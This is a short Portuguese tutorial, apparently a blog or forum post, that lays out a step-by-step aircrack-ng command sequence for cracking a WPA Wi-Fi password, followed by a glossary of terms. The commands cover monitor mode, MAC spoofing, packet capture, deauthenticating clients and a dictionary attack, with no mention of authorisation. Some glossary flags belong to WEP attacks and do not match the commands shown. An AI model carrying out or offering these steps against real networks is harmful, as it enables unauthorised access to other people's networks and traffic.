
Exemplo de como descobrir a password de uma rede Wifi WPA:
~# airmon-ng start wlan0 ~# ifconfig mon0 down ~# macchanger -m 00:11:22:33:44:55 mon0 ~# ifconfig mon0 up ~# airodump-ng ~# airodump-ng -c (canal) --bssid (bssid) -w (Nome_do_Ficheiro) mon0 ~# aireplay-ng -0 30 -a (bssid) -c (station) mon0 ~# aircrack-ng -w (dicionarip) (.cap file_name)
Entendam os termos:
- airmon – Uma ferramenta que põem o vosso dispositivo wireless em modo de escuta.
- airodump – Uma ferramenta para capturar pacotes a partir de um router wireless.
- aireplay – uma ferramenta para forjar requisições ARP
- aircrack – Uma ferramenta para desencriptar chaves WEP
- iwconfig – Uma ferramenta para configurar placas wireless. Poderá-se verificar com esta ferramenta que a nossa placa wireless está em modo de escuta.
- macchanger – Uma ferramenta que nos permite modificar o nosso enderenço MAC.
- AP: Ponto de acesso de um router wireless.
- MAC Address: Media Access Control address, Um identificador único atribuído a routers e placas. Vem no formato hexadecimal (exemplo 00:11:ef:22:a3:6a).
- BSSID: endereço MAC do Ponto de Acesso (Router)
- ESSID: Nome do ponto de acesso (Router).
- WEP: Significa: Wired Equivalency Privacy. È um protocolo de segurança para redes Wi-Fi
- WPA: Significa: WiFi Protected Access. um protocolo mais seguro que o WEP para redes sem fio.
- -w diz ao airodump para escrever o ficheiro.
- CH é o canal do alvo.
- 1 diz airodump para recolher apenas IVS – os pacotes de dados com a chave WEP.
- -1 No início especifica o tipo de ataque. Neste caso, queremos autenticação falsa. Você pode ver todas as opções, digitando aireplay-ng –h
- 0 Especifica o tempo entre ataques
- -e é o (nome) essid. belkin é o nome essid ou transmissão do meu alvo. Linksys ou padrão são outros nomes comuns na essid.
- -a é o endereço MAC do alvo.
- -h é o vosso enderenço MAC. Podem ver ou modifica-lo com macchanger.
- mon0 é o nome da vossa placa criada para escutar os pacotes